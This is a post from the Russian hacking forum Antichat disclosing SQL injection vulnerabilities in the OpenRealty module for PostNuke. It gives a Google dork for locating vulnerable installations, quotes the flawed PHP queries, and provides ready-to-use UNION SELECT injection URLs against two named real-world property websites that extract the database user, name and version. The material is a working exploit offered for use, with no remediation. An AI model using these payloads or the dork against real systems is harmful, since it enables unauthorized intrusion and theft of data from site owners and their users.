|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
PostNuke. Модуль: OpenRealty SQL
Уязвимый продукт: Модуль: OpenRealty
Версия: 71c
Дорк: "inurl:module=OpenRealty"
Условие: "нет"
1 Код
PHP код:
$sql = "SELECT $realtyhomescolumn[or_agent],
$realtyhomescolumn[or_mls],
$realtyhomescolumn[or_title],
$realtyhomescolumn[or_address],
$realtyhomescolumn[or_city],
$realtyhomescolumn[or_state],
$realtyhomescolumn[or_zip],
$realtyhomescolumn[or_neighborhood],
$realtyhomescolumn[or_virtualtour],
$realtyhomescolumn[or_yearbuilt],
$realtyhomescolumn[or_sqfeet],
$realtyhomescolumn[or_lotsize],
$realtyhomescolumn[or_garagesize],
$realtyhomescolumn[or_type],
$realtyhomescolumn[or_beds],
$realtyhomescolumn[or_baths],
$realtyhomescolumn[or_numfloors],
$realtyhomescolumn[or_price],
$realtyhomescolumn[or_status],
$realtyhomescolumn[or_featured],
$realtyhomescolumn[or_dateposted],
$realtyhomescolumn[or_previewdesc],
$realtyhomescolumn[or_fulldesc],";
for($x=1;$x<=20;$x++) {
$featurenum = "or_pfeat".$x;
$sql .= "$realtyhomescolumn[$featurenum],";
}
for($x=1;$x<=20;$x++) {
$featurenum = "or_cfeat".$x;
$sql .= "$realtyhomescolumn[$featurenum],";
}
$sql .= " $realtyhomescolumn[or_notes]
FROM $realtyhomes
WHERE $realtyhomescolumn[or_hid]=$or_hid";
Вот такие вот жёсткие запросы 
Уязвимый параметр or_hid
Пример уязвимости:
http://www.alpujar.com/english/index.php?module=OpenRealty&func=display&or_hid=-274+union+select+1,2,concat_ws(0x3a,User(),Databas e(),Version()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1 ,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 ,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,64/*
2 Код:
PHP код:
$sql = "SELECT $realtycolumn[or_pictype], $realtycolumn[or_picdata] FROM $realtytable WHERE $realtycolumn[or_picid] = $or_picid";
Уязвимый параметр or_picid
Пример уязвимости:
http://www.bulgarianpropertiesonline.com/modules/OpenRealty/image.php?or_picid=-1074+union+select+1,concat_ws(0x3a,User(),Database (),Version())/*
|